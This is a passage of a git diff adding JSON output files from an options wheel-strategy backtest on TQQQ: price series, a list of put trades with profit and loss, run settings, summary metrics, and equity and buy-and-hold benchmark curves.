608.0433349609375 + ], + [ + "2026-02-23", + 600.652587890625 + ], + [ + "2026-02-24", + 607.1044921875 + ], + [ + "2026-02-25", + 615.9033813476562 + ], + [ + "2026-02-26", + 608.4727783203125 + ], + [ + "2026-02-27", + 606.5252075195312 + ], + [ + "2026-03-02", + 607.32421875 + ], + [ + "2026-03-03", + 600.8224487304688 + ], + [ + "2026-03-04", + 609.9808959960938 + ], + [ + "2026-03-05", + 608.1431274414062 + ], + [ + "2026-03-06", + 598.9946899414062 + ], + [ + "2026-03-09", + 606.99462890625 + ], + [ + "2026-03-10", + 607.004638671875 + ], + [ + "2026-03-11", + 606.9247436523438 + ], + [ + "2026-03-12", + 596.5078735351562 + ], + [ + "2026-03-13", + 592.9722900390625 + ], + [ + "2026-03-16", + 599.6239013671875 + ], + [ + "2026-03-17", + 602.5502319335938 + ], + [ + "2026-03-18", + 594.15087890625 + ], + [ + "2026-03-19", + 592.273193359375 + ], + [ + "2026-03-20", + 581.3269653320312 + ], + [ + "2026-03-23", + 588.0 + ], + [ + "2026-03-24", + 583.97998046875 + ], + [ + "2026-03-25", + 587.8200073242188 + ], + [ + "2026-03-26", + 573.7899780273438 + ], + [ + "2026-03-27", + 562.5800170898438 + ], + [ + "2026-03-30", + 558.280029296875 + ], + [ + "2026-03-31", + 577.1799926757812 + ], + [ + "2026-04-01", + 584.3099975585938 + ], + [ + "2026-04-02", + 584.97998046875 + ], + [ + "2026-04-06", + 588.5 + ], + [ + "2026-04-07", + 588.5900268554688 + ], + [ + "2026-04-08", + 606.0900268554688 + ], + [ + "2026-04-09", + 610.1900024414062 + ], + [ + "2026-04-10", + 611.0700073242188 + ], + [ + "2026-04-13", + 617.3900146484375 + ], + [ + "2026-04-14", + 628.5999755859375 + ], + [ + "2026-04-15", + 637.4000244140625 + ], + [ + "2026-04-16", + 640.469970703125 + ], + [ + "2026-04-17", + 648.8499755859375 + ], + [ + "2026-04-20", + 646.7899780273438 + ], + [ + "2026-04-21", + 644.3300170898438 + ], + [ + "2026-04-22", + 655.1099853515625 + ], + [ + "2026-04-23", + 651.4199829101562 + ] + ] +} \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/trades.json b/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/trades.json new file mode 100644 index 0000000..a1b7f48 --- /dev/null +++ b/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/trades.json @@ -0,0 +1,110 @@ +[ + { + "date": "2025-09-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 39.74, + "spot": 44.36949920654297, + "premium": 0.5536159877961406, + "close_cost": 0.03495383585154532, + "pnl": 45.886215194459524, + "hold_days": 14, + "result": "Win" + }, + { + "date": "2025-10-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 44.03, + "spot": 53.771759033203125, + "premium": 0.7966187749534139, + "close_cost": 0.05749347645129843, + "pnl": 67.93252985021155, + "hold_days": 10, + "result": "Win" + }, + { + "date": "2025-11-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 48.48, + "spot": 51.84297180175781, + "premium": 1.778766330702327, + "close_cost": 0.1473346610213957, + "pnl": 157.16316696809312, + "hold_days": 19, + "result": "Win" + }, + { + "date": "2025-12-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 47.91, + "spot": 54.83333969116211, + "premium": 1.0365927316800434, + "close_cost": 0.06827979046142785, + "pnl": 90.85129412186156, + "hold_days": 11, + "result": "Win" + }, + { + "date": "2026-01-09 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 47.56, + "spot": 55.6679573059082, + "premium": 0.5702405787526459, + "close_cost": 0.10914421850859846, + "pnl": 40.129636024404746, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2026-02-05 00:00:00", + "type": "PUT", + "action": "SL_Close", + "strike": 47.71, + "spot": 47.561363220214844, + "premium": 0.7215057151762458, + "close_cost": 2.419175603087396, + "pnl": -175.746988791115, + "hold_days": 2, + "result": "Loss" + }, + { + "date": "2026-03-11 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 45.23, + "spot": 49.26853942871094, + "premium": 1.0610637306577004, + "close_cost": 0.17795843012527435, + "pnl": 82.33053005324261, + "hold_days": 15, + "result": "Win" + }, + { + "date": "2026-03-20 00:00:00", + "type": "PUT", + "action": "SL_Close", + "strike": 43.75, + "spot": 43.00889205932617, + "premium": 0.8460148560320597, + "close_cost": 2.6650036731767415, + "pnl": -187.87888171446818, + "hold_days": 3, + "result": "Loss" + }, + { + "date": "2026-04-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.18, + "spot": 50.65999984741211, + "premium": 1.4108038692109268, + "close_cost": 0.26249808042923695, + "pnl": 108.85057887816899, + "hold_days": 6, + "result": "Win" + } +] \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/charts/drawdown.png b/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/charts/drawdown.png new file mode 100644 index 0000000..4a17551 Binary files /dev/null and b/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/charts/drawdown.png differ diff --git a/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/charts/equity.png b/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/charts/equity.png new file mode 100644 index 0000000..c95b990 Binary files /dev/null and b/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/charts/equity.png differ diff --git a/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/charts/indicators.png b/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/charts/indicators.png new file mode 100644 index 0000000..7f82d5f Binary files /dev/null and b/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/charts/indicators.png differ diff --git a/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/charts/monthly.png b/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/charts/monthly.png new file mode 100644 index 0000000..c68046b Binary files /dev/null and b/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/charts/monthly.png differ diff --git a/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/meta.json b/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/meta.json new file mode 100644 index 0000000..3afdb5b --- /dev/null +++ b/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/meta.json @@ -0,0 +1,13 @@ +{ + "start": "2025-04-24", + "end": "2026-04-24", + "style": "conservative", + "underlying_ticker": "TQQQ", + "signal_ticker": "QQQ", + "put_otm_pct": 12.0, + "call_otm_pct": 0.0, + "put_tp_pct": 50.0, + "call_tp_pct": 50.0, + "put_sl_pct": 150.0, + "call_sl_pct": null +} \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/metrics.json b/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/metrics.json new file mode 100644 index 0000000..8713bc9 --- /dev/null +++ b/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/metrics.json @@ -0,0 +1,15 @@ +{ + "total_return": 5.458408550097382, + "final_value": 10545.84085500974, + "cagr": 5.477657356105814, + "sharpe": 2.031983303515009, + "max_dd": -0.6003518878697439, + "n_trades": 3, + "wins": 3, + "losses": 0, + "win_rate": 100.0, + "avg_win": 81.69156838518819, + "avg_loss": 0.0, + "chain_quotes": 0, + "bs_quotes": 21 +} \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/series.json b/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/series.json new file mode 100644 index 0000000..31ea8d2 --- /dev/null +++ b/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/series.json @@ -0,0 +1,6088 @@ +{ + "equity": [ + [ + "2025-04-24", + 10001.173037138344 + ], + [ + "2025-04-25", + 10002.3462118783 + ], + [ + "2025-04-28", + 10003.519524236011 + ], + [ + "2025-04-29", + 10004.692974227619 + ], + [ + "2025-04-30", + 10005.866561869268 + ], + [ + "2025-05-01", + 10007.040287177108 + ], + [ + "2025-05-02", + 10008.214150167285 + ], + [ + "2025-05-05", + 10009.38815085595 + ], + [ + "2025-05-06", + 10010.562289259256 + ], + [ + "2025-05-07", + 10011.736565393358 + ], + [ + "2025-05-08", + 10012.910979274411 + ], + [ + "2025-05-09", + 10014.085530918574 + ], + [ + "2025-05-12", + 10015.260220342007 + ], + [ + "2025-05-13", + 10016.435047560872 + ], + [ + "2025-05-14", + 10017.610012591333 + ], + [ + "2025-05-15", + 10018.785115449555 + ], + [ + "2025-05-16", + 10019.960356151707 + ], + [ + "2025-05-19", + 10021.135734713958 + ], + [ + "2025-05-20", + 10022.31125115248 + ], + [ + "2025-05-21", + 10023.486905483445 + ], + [ + "2025-05-22", + 10024.66269772303 + ], + [ + "2025-05-23", + 10025.83862788741 + ], + [ + "2025-05-27", + 10027.014695992766 + ], + [ + "2025-05-28", + 10028.19090205528 + ], + [ + "2025-05-29", + 10029.367246091131 + ], + [ + "2025-05-30", + 10030.543728116507 + ], + [ + "2025-06-02", + 10031.720348147594 + ], + [ + "2025-06-03", + 10032.89710620058 + ], + [ + "2025-06-04", + 10034.074002291656 + ], + [ + "2025-06-05", + 10035.251036437016 + ], + [ + "2025-06-06", + 10036.428208652851 + ], + [ + "2025-06-09", + 10037.605518955359 + ], + [ + "2025-06-10", + 10038.782967360738 + ], + [ + "2025-06-11", + 10039.960553885187 + ], + [ + "2025-06-12", + 10041.138278544908 + ], + [ + "2025-06-13", + 10042.316141356107 + ], + [ + "2025-06-16", + 10043.494142334986 + ], + [ + "2025-06-17", + 10044.672281497757 + ], + [ + "2025-06-18", + 10045.850558860626 + ], + [ + "2025-06-20", + 10047.028974439807 + ], + [ + "2025-06-23", + 10048.20752825151 + ], + [ + "2025-06-24", + 10049.386220311953 + ], + [ + "2025-06-25", + 10050.565050637353 + ], + [ + "2025-06-26", + 10051.744019243928 + ], + [ + "2025-06-27", + 10052.923126147898 + ], + [ + "2025-06-30", + 10054.102371365487 + ], + [ + "2025-07-01", + 10055.28175491292 + ], + [ + "2025-07-02", + 10056.461276806422 + ], + [ + "2025-07-03", + 10057.640937062224 + ], + [ + "2025-07-07", + 10058.820735696554 + ], + [ + "2025-07-08", + 10060.000672725646 + ], + [ + "2025-07-09", + 10061.180748165734 + ], + [ + "2025-07-10", + 10062.360962033054 + ], + [ + "2025-07-11", + 10063.541314343844 + ], + [ + "2025-07-14", + 10064.721805114343 + ], + [ + "2025-07-15", + 10065.902434360793 + ], + [ + "2025-07-16", + 10067.083202099438 + ], + [ + "2025-07-17", + 10068.264108346526 + ], + [ + "2025-07-18", + 10069.4451531183 + ], + [ + "2025-07-21", + 10070.626336431013 + ], + [ + "2025-07-22", + 10071.807658300915 + ], + [ + "2025-07-23", + 10072.98911874426 + ], + [ + "2025-07-24", + 10074.170717777304 + ], + [ + "2025-07-25", + 10075.352455416301 + ], + [ + "2025-07-28", + 10076.534331677512 + ], + [ + "2025-07-29", + 10077.7163465772 + ], + [ + "2025-07-30", + 10078.898500131623 + ], + [ + "2025-07-31", + 10080.080792357048 + ], + [ + "2025-08-01", + 10081.263223269743 + ], + [ + "2025-08-04", + 10082.445792885976 + ], + [ + "2025-08-05", + 10083.628501222016 + ], + [ + "2025-08-06", + 10084.811348294137 + ], + [ + "2025-08-07", + 10085.994334118612 + ], + [ + "2025-08-08", + 10087.177458711718 + ], + [ + "2025-08-11", + 10088.360722089732 + ], + [ + "2025-08-12", + 10089.544124268934 + ], + [ + "2025-08-13", + 10090.727665265607 + ], + [ + "2025-08-14", + 10091.911345096036 + ], + [ + "2025-08-15", + 10093.095163776503 + ], + [ + "2025-08-18", + 10094.279121323298 + ], + [ + "2025-08-19", + 10095.463217752711 + ], + [ + "2025-08-20", + 10096.647453081032 + ], + [ + "2025-08-21", + 10097.831827324555 + ], + [ + "2025-08-22", + 10099.016340499576 + ], + [ + "2025-08-25", + 10100.200992622393 + ], + [ + "2025-08-26", + 10101.385783709302 + ], + [ + "2025-08-27", + 10102.570713776606 + ], + [ + "2025-08-28", + 10103.755782840606 + ], + [ + "2025-08-29", + 10104.94099091761 + ], + [ + "2025-09-02", + 10106.126338023923 + ], + [ + "2025-09-03", + 10107.311824175853 + ], + [ + "2025-09-04", + 10108.497449389712 + ], + [ + "2025-09-05", + 10109.68321368181 + ], + [ + "2025-09-08", + 10110.869117068465 + ], + [ + "2025-09-09", + 10112.05515956599 + ], + [ + "2025-09-10", + 10113.241341190707 + ], + [ + "2025-09-11", + 10114.427661958933 + ], + [ + "2025-09-12", + 10115.61412188699 + ], + [ + "2025-09-15", + 10116.800720991205 + ], + [ + "2025-09-16", + 10117.9874592879 + ], + [ + "2025-09-17", + 10119.174336793405 + ], + [ + "2025-09-18", + 10120.36135352405 + ], + [ + "2025-09-19", + 10121.548509496164 + ], + [ + "2025-09-22", + 10122.735804726084 + ], + [ + "2025-09-23", + 10123.923239230144 + ], + [ + "2025-09-24", + 10125.110813024681 + ], + [ + "2025-09-25", + 10126.298526126035 + ], + [ + "2025-09-26", + 10127.486378550546 + ], + [ + "2025-09-29", + 10128.674370314558 + ], + [ + "2025-09-30", + 10129.862501434416 + ], + [ + "2025-10-01", + 10131.050771926466 + ], + [ + "2025-10-02", + 10132.23918180706 + ], + [ + "2025-10-03", + 10133.427731092544 + ], + [ + "2025-10-06", + 10134.616419799275 + ], + [ + "2025-10-07", + 10135.805247943605 + ], + [ + "2025-10-08", + 10136.99421554189 + ], + [ + "2025-10-09", + 10138.183322610492 + ], + [ + "2025-10-10", + 10139.37256916577 + ], + [ + "2025-10-13", + 10140.561955224084 + ], + [ + "2025-10-14", + 10141.7514808018 + ], + [ + "2025-10-15", + 10142.941145915285 + ], + [ + "2025-10-16", + 10144.130950580906 + ], + [ + "2025-10-17", + 10145.320894815031 + ], + [ + "2025-10-20", + 10146.510978634036 + ], + [ + "2025-10-21", + 10147.701202054292 + ], + [ + "2025-10-22", + 10148.891565092175 + ], + [ + "2025-10-23", + 10150.082067764064 + ], + [ + "2025-10-24", + 10151.272710086338 + ], + [ + "2025-10-27", + 10152.463492075378 + ], + [ + "2025-10-28", + 10153.654413747567 + ], + [ + "2025-10-29", + 10154.845475119291 + ], + [ + "2025-10-30", + 10156.036676206937 + ], + [ + "2025-10-31", + 10157.228017026895 + ], + [ + "2025-11-03", + 10158.419497595556 + ], + [ + "2025-11-04", + 10159.611117929313 + ], + [ + "2025-11-05", + 10160.80287804456 + ], + [ + "2025-11-06", + 10161.994777957694 + ], + [ + "2025-11-07", + 10163.186817685115 + ], + [ + "2025-11-10", + 10164.378997243222 + ], + [ + "2025-11-11", + 10165.57131664842 + ], + [ + "2025-11-12", + 10166.763775917112 + ], + [ + "2025-11-13", + 10167.956375065705 + ], + [ + "2025-11-14", + 10169.149114110607 + ], + [ + "2025-11-17", + 10170.341993068228 + ], + [ + "2025-11-18", + 10171.535011954982 + ], + [ + "2025-11-19", + 10172.72817078728 + ], + [ + "2025-11-20", + 10173.921469581543 + ], + [ + "2025-11-21", + 10172.124908354184 + ], + [ + "2025-11-24", + 10242.875502053761 + ], + [ + "2025-11-25", + 10264.35836972952 + ], + [ + "2025-11-26", + 10282.336768370122 + ], + [ + "2025-11-28", + 10283.542924659949 + ], + [ + "2025-12-01", + 10284.749222436387 + ], + [ + "2025-12-02", + 10285.955661716034 + ], + [ + "2025-12-03", + 10287.16224251549 + ], + [ + "2025-12-04", + 10288.368964851354 + ], + [ + "2025-12-05", + 10289.57582874023 + ], + [ + "2025-12-08", + 10290.782834198722 + ], + [ + "2025-12-09", + 10291.989981243438 + ], + [ + "2025-12-10", + 10293.197269890985 + ], + [ + "2025-12-11", + 10294.404700157973 + ], + [ + "2025-12-12", + 10295.612272061016 + ], + [ + "2025-12-15", + 10296.819985616728 + ], + [ + "2025-12-16", + 10298.027840841725 + ], + [ + "2025-12-17", + 10299.235837752627 + ], + [ + "2025-12-18", + 10300.443976366052 + ], + [ + "2025-12-19", + 10301.652256698624 + ], + [ + "2025-12-22", + 10302.860678766965 + ], + [ + "2025-12-23", + 10304.069242587704 + ], + [ + "2025-12-24", + 10305.277948177467 + ], + [ + "2025-12-26", + 10306.486795552884 + ], + [ + "2025-12-29", + 10307.695784730588 + ], + [ + "2025-12-30", + 10308.904915727213 + ], + [ + "2025-12-31", + 10310.114188559393 + ], + [ + "2026-01-02", + 10311.323603243769 + ], + [ + "2026-01-05", + 10312.533159796978 + ], + [ + "2026-01-06", + 10313.742858235662 + ], + [ + "2026-01-07", + 10314.952698576468 + ], + [ + "2026-01-08", + 10316.162680836038 + ], + [ + "2026-01-09", + 10317.37280503102 + ], + [ + "2026-01-12", + 10318.583071178065 + ], + [ + "2026-01-13", + 10319.793479293823 + ], + [ + "2026-01-14", + 10321.00402939495 + ], + [ + "2026-01-15", + 10322.214721498098 + ], + [ + "2026-01-16", + 10323.425555619926 + ], + [ + "2026-01-20", + 10324.636531777094 + ], + [ + "2026-01-21", + 10325.847649986263 + ], + [ + "2026-01-22", + 10327.058910264095 + ], + [ + "2026-01-23", + 10328.270312627255 + ], + [ + "2026-01-26", + 10329.481857092413 + ], + [ + "2026-01-27", + 10330.693543676236 + ], + [ + "2026-01-28", + 10331.905372395395 + ], + [ + "2026-01-29", + 10333.117343266564 + ], + [ + "2026-01-30", + 10334.329456306416 + ], + [ + "2026-02-02", + 10335.541711531629 + ], + [ + "2026-02-03", + 10336.754108958881 + ], + [ + "2026-02-04", + 10337.966648604855 + ], + [ + "2026-02-05", + 10336.189330486233 + ], + [ + "2026-02-06", + 10365.442052060358 + ], + [ + "2026-02-09", + 10393.125118991906 + ], + [ + "2026-02-10", + 10387.206759066115 + ], + [ + "2026-02-11", + 10395.58962891959 + ], + [ + "2026-02-12", + 10333.17951032718 + ], + [ + "2026-02-13", + 10343.402612768348 + ], + [ + "2026-02-17", + 10357.34795019732 + ], + [ + "2026-02-18", + 10396.264536658502 + ], + [ + "2026-02-19", + 10400.318348409004 + ], + [ + "2026-02-20", + 10417.844160971756 + ], + [ + "2026-02-23", + 10419.066212781987 + ], + [ + "2026-02-24", + 10420.288407943433 + ], + [ + "2026-02-25", + 10421.510746472912 + ], + [ + "2026-02-26", + 10422.733228387238 + ], + [ + "2026-02-27", + 10423.955853703234 + ], + [ + "2026-03-02", + 10425.17862243772 + ], + [ + "2026-03-03", + 10426.40153460752 + ], + [ + "2026-03-04", + 10427.624590229458 + ], + [ + "2026-03-05", + 10428.847789320364 + ], + [ + "2026-03-06", + 10430.071131897064 + ], + [ + "2026-03-09", + 10431.294617976393 + ], + [ + "2026-03-10", + 10432.518247575183 + ], + [ + "2026-03-11", + 10433.74202071027 + ], + [ + "2026-03-12", + 10434.965937398489 + ], + [ + "2026-03-13", + 10436.189997656682 + ], + [ + "2026-03-16", + 10437.41420150169 + ], + [ + "2026-03-17", + 10438.638548950354 + ], + [ + "2026-03-18", + 10439.863040019522 + ], + [ + "2026-03-19", + 10441.087674726039 + ], + [ + "2026-03-20", + 10442.312453086755 + ], + [ + "2026-03-23", + 10443.537375118522 + ], + [ + "2026-03-24", + 10444.762440838193 + ], + [ + "2026-03-25", + 10445.987650262621 + ], + [ + "2026-03-26", + 10447.213003408666 + ], + [ + "2026-03-27", + 10445.448500293185 + ], + [ + "2026-03-30", + 10433.689472932487 + ], + [ + "2026-03-31", + 10467.382284274632 + ], + [ + "2026-04-01", + 10500.276992915504 + ], + [ + "2026-04-02", + 10505.848498184801 + ], + [ + "2026-04-06", + 10529.772190631718 + ], + [ + "2026-04-07", + 10531.00737201551 + ], + [ + "2026-04-08", + 10532.242698290665 + ], + [ + "2026-04-09", + 10533.478169474181 + ], + [ + "2026-04-10", + 10534.713785583055 + ], + [ + "2026-04-13", + 10535.949546634287 + ], + [ + "2026-04-14", + 10537.185452644879 + ], + [ + "2026-04-15", + 10538.421503631836 + ], + [ + "2026-04-16", + 10539.657699612166 + ], + [ + "2026-04-17", + 10540.894040602874 + ], + [ + "2026-04-20", + 10542.130526620973 + ], + [ + "2026-04-21", + 10543.367157683473 + ], + [ + "2026-04-22", + 10544.60393380739 + ], + [ + "2026-04-23", + 10545.84085500974 + ] + ], + "benchmark_bh": [ + [ + "2025-04-24", + 10000.0 + ], + [ + "2025-04-25", + 10111.479693975612 + ], + [ + "2025-04-28", + 10108.271107088458 + ], + [ + "2025-04-29", + 10175.030711228887 + ], + [ + "2025-04-30", + 10173.74596416855 + ], + [ + "2025-05-01", + 10306.622798919238 + ], + [ + "2025-05-02", + 10459.61333969014 + ], + [ + "2025-05-05", + 10397.560975289682 + ], + [ + "2025-05-06", + 10300.846030216884 + ], + [ + "2025-05-07", + 10341.286691897052 + ], + [ + "2025-05-08", + 10448.059146132695 + ], + [ + "2025-05-09", + 10441.21153616248 + ], + [ + "2025-05-12", + 10866.589450612499 + ], + [ + "2025-05-13", + 11032.205682361446 + ], + [ + "2025-05-14", + 11098.320944513494 + ], + [ + "2025-05-15", + 11110.516199295633 + ], + [ + "2025-05-16", + 11158.875968366614 + ], + [ + "2025-05-19", + 11169.57519490689 + ], + [ + "2025-05-20", + 11132.341151655664 + ], + [ + "2025-05-21", + 10977.640020697681 + ], + [ + "2025-05-22", + 10998.182850608326 + ], + [ + "2025-05-23", + 10896.330229599655 + ], + [ + "2025-05-27", + 11152.668763468355 + ], + [ + "2025-05-28", + 11103.240777740464 + ], + [ + "2025-05-29", + 11125.068354711446 + ], + [ + "2025-05-30", + 11107.521518200956 + ], + [ + "2025-06-02", + 11195.250451531507 + ], + [ + "2025-06-03", + 11282.765479069581 + ], + [ + "2025-06-04", + 11314.218816702027 + ], + [ + "2025-06-05", + 11229.056752881199 + ], + [ + "2025-06-06", + 11338.825856669733 + ], + [ + "2025-06-09", + 11355.515757704841 + ], + [ + "2025-06-10", + 11430.620312362824 + ], + [ + "2025-06-11", + 11392.102834356734 + ], + [ + "2025-06-12", + 11418.850244554687 + ], + [ + "2025-06-13", + 11275.491369819887 + ], + [ + "2025-06-16", + 11432.331558702639 + ], + [ + "2025-06-17", + 11320.852520879764 + ], + [ + "2025-06-18", + 11318.926056441996 + ], + [ + "2025-06-20", + 11272.70928221221 + ], + [ + "2025-06-23", + 11388.619975625237 + ], + [ + "2025-06-24", + 11562.774722949349 + ], + [ + "2025-06-25", + 11592.33440378091 + ], + [ + "2025-06-26", + 11700.72558682036 + ], + [ + "2025-06-27", + 11740.785023759947 + ], + [ + "2025-06-30", + 11816.830501443734 + ], + [ + "2025-07-01", + 11717.221266645118 + ], + [ + "2025-07-02", + 11798.836168766158 + ], + [ + "2025-07-03", + 11914.939771084057 + ], + [ + "2025-07-07", + 11825.184638099614 + ], + [ + "2025-07-08", + 11831.826216110203 + ], + [ + "2025-07-09", + 11915.581488461488 + ], + [ + "2025-07-10", + 11898.445403564772 + ], + [ + "2025-07-11", + 11871.669122646364 + ], + [ + "2025-07-14", + 11914.72586529158 + ], + [ + "2025-07-15", + 11925.649496068136 + ], + [ + "2025-07-16", + 11937.861810821454 + ], + [ + "2025-07-17", + 12034.469802998014 + ], + [ + "2025-07-18", + 12022.903142538553 + ], + [ + "2025-07-21", + 12085.23896492168 + ], + [ + "2025-07-22", + 12022.689236746075 + ], + [ + "2025-07-23", + 12077.526545643232 + ], + [ + "2025-07-24", + 12103.23198529378 + ], + [ + "2025-07-25", + 12132.366479151337 + ], + [ + "2025-07-28", + 12170.281608944255 + ], + [ + "2025-07-29", + 12151.431653096772 + ], + [ + "2025-07-30", + 12167.710802518104 + ], + [ + "2025-07-31", + 12103.23198529378 + ], + [ + "2025-08-01", + 11864.813638843298 + ], + [ + "2025-08-04", + 12083.73899976339 + ], + [ + "2025-08-05", + 12001.696286057397 + ], + [ + "2025-08-06", + 12152.717712462585 + ], + [ + "2025-08-07", + 12193.844053753606 + ], + [ + "2025-08-08", + 12307.592067743308 + ], + [ + "2025-08-11", + 12271.17427849773 + ], + [ + "2025-08-12", + 12425.4082287065 + ], + [ + "2025-08-13", + 12431.621995132135 + ], + [ + "2025-08-14", + 12421.980486804965 + ], + [ + "2025-08-15", + 12367.358396005762 + ], + [ + "2025-08-18", + 12362.430688945939 + ], + [ + "2025-08-19", + 12194.70098922899 + ], + [ + "2025-08-20", + 12122.297159239215 + ], + [ + "2025-08-21", + 12066.175103281721 + ], + [ + "2025-08-22", + 12252.324322650247 + ], + [ + "2025-08-25", + 12216.981311588957 + ], + [ + "2025-08-26", + 12266.03266564543 + ], + [ + "2025-08-27", + 12284.885246103864 + ], + [ + "2025-08-28", + 12361.787659263033 + ], + [ + "2025-08-29", + 12218.693870234249 + ], + [ + "2025-09-02", + 12116.299923217006 + ], + [ + "2025-09-03", + 12211.624480638704 + ], + [ + "2025-09-04", + 12322.157346213875 + ], + [ + "2025-09-05", + 12339.93777309897 + ], + [ + "2025-09-08", + 12400.131912946379 + ], + [ + "2025-09-09", + 12435.262330520669 + ], + [ + "2025-09-10", + 12439.333102105109 + ], + [ + "2025-09-11", + 12511.736932094884 + ], + [ + "2025-09-12", + 12567.00336488247 + ], + [ + "2025-09-15", + 12674.537612446535 + ], + [ + "2025-09-16", + 12663.826575156982 + ], + [ + "2025-09-17", + 12638.551571702337 + ], + [ + "2025-09-18", + 12752.51217917904 + ], + [ + "2025-09-19", + 12838.839570261951 + ], + [ + "2025-09-22", + 12914.844366476002 + ], + [ + "2025-09-23", + 12829.060269859874 + ], + [ + "2025-09-24", + 12784.0232582524 + ], + [ + "2025-09-25", + 12728.907740594477 + ], + [ + "2025-09-26", + 12781.234609117348 + ], + [ + "2025-09-29", + 12840.426147581611 + ], + [ + "2025-09-30", + 12875.598558931111 + ], + [ + "2025-10-01", + 12937.362216127001 + ], + [ + "2025-10-02", + 12990.548644736205 + ], + [ + "2025-10-03", + 12935.86225096871 + ], + [ + "2025-10-06", + 13033.012225306578 + ], + [ + "2025-10-07", + 12964.38521047477 + ], + [ + "2025-10-08", + 13113.006430165598 + ], + [ + "2025-10-09", + 13097.136720052566 + ], + [ + "2025-10-10", + 12642.479301989966 + ], + [ + "2025-10-13", + 12910.769657975135 + ], + [ + "2025-10-14", + 12824.77165556653 + ], + [ + "2025-10-15", + 12915.273490366431 + ], + [ + "2025-10-16", + 12867.44914192938 + ], + [ + "2025-10-17", + 12951.94586687422 + ], + [ + "2025-10-20", + 13115.15073731227 + ], + [ + "2025-10-21", + 13111.720370799785 + ], + [ + "2025-10-22", + 12985.401782662004 + ], + [ + "2025-10-23", + 13094.563289015465 + ], + [ + "2025-10-24", + 13234.390749716182 + ], + [ + "2025-10-27", + 13470.084749999902 + ], + [ + "2025-10-28", + 13573.668958083257 + ], + [ + "2025-10-29", + 13634.790897901716 + ], + [ + "2025-10-30", + 13426.333797758241 + ], + [ + "2025-10-31", + 13491.10263449261 + ], + [ + "2025-11-03", + 13555.653628518077 + ], + [ + "2025-11-04", + 13280.49991489699 + ], + [ + "2025-11-05", + 13366.929665806976 + ], + [ + "2025-11-06", + 13117.939386447322 + ], + [ + "2025-11-07", + 13076.547959450285 + ], + [ + "2025-11-10", + 13365.856199928165 + ], + [ + "2025-11-11", + 13330.25597699371 + ], + [ + "2025-11-12", + 13319.747034747355 + ], + [ + "2025-11-13", + 13047.81109415175 + ], + [ + "2025-11-14", + 13057.675694409723 + ], + [ + "2025-11-17", + 12946.155975117113 + ], + [ + "2025-11-18", + 12788.52577833822 + ], + [ + "2025-11-19", + 12864.874398586804 + ], + [ + "2025-11-20", + 12560.339477678799 + ], + [ + "2025-11-21", + 12654.703427492563 + ], + [ + "2025-11-24", + 12978.324519233609 + ], + [ + "2025-11-25", + 13058.320036398105 + ], + [ + "2025-11-26", + 13173.699246093627 + ], + [ + "2025-11-28", + 13280.49991489699 + ], + [ + "2025-12-01", + 13235.892027179945 + ], + [ + "2025-12-02", + 13339.476235263302 + ], + [ + "2025-12-03", + 13372.075215575702 + ], + [ + "2025-12-04", + 13359.637184280627 + ], + [ + "2025-12-05", + 13414.109672255645 + ], + [ + "2025-12-08", + 13388.374049579163 + ], + [ + "2025-12-09", + 13404.886789375103 + ], + [ + "2025-12-10", + 13459.789713546024 + ], + [ + "2025-12-11", + 13416.255291707792 + ], + [ + "2025-12-12", + 13159.758625029313 + ], + [ + "2025-12-15", + 13093.705041234607 + ], + [ + "2025-12-16", + 13119.654569703565 + ], + [ + "2025-12-17", + 12876.455494406495 + ], + [ + "2025-12-18", + 13063.036462276401 + ], + [ + "2025-12-19", + 13233.31990844832 + ], + [ + "2025-12-22", + 13296.752818208815 + ], + [ + "2025-12-23", + 13359.025649929128 + ], + [ + "2025-12-24", + 13398.108731595079 + ], + [ + "2025-12-26", + 13397.249171508745 + ], + [ + "2025-12-29", + 13332.398971834906 + ], + [ + "2025-12-30", + 13301.47580561449 + ], + [ + "2025-12-31", + 13191.530852892261 + ], + [ + "2026-01-02", + 13165.97764067685 + ], + [ + "2026-01-05", + 13270.553951699547 + ], + [ + "2026-01-06", + 13387.156230098068 + ], + [ + "2026-01-07", + 13400.041757560224 + ], + [ + "2026-01-08", + 13323.808620193468 + ], + [ + "2026-01-09", + 13456.516823690577 + ], + [ + "2026-01-12", + 13467.683230980068 + ], + [ + "2026-01-13", + 13447.712566256663 + ], + [ + "2026-01-14", + 13304.053173568016 + ], + [ + "2026-01-15", + 13351.940512667881 + ], + [ + "2026-01-16", + 13340.774105378392 + ], + [ + "2026-01-20", + 13057.320059625912 + ], + [ + "2026-01-21", + 13233.834332194647 + ], + [ + "2026-01-22", + 13330.036821979333 + ], + 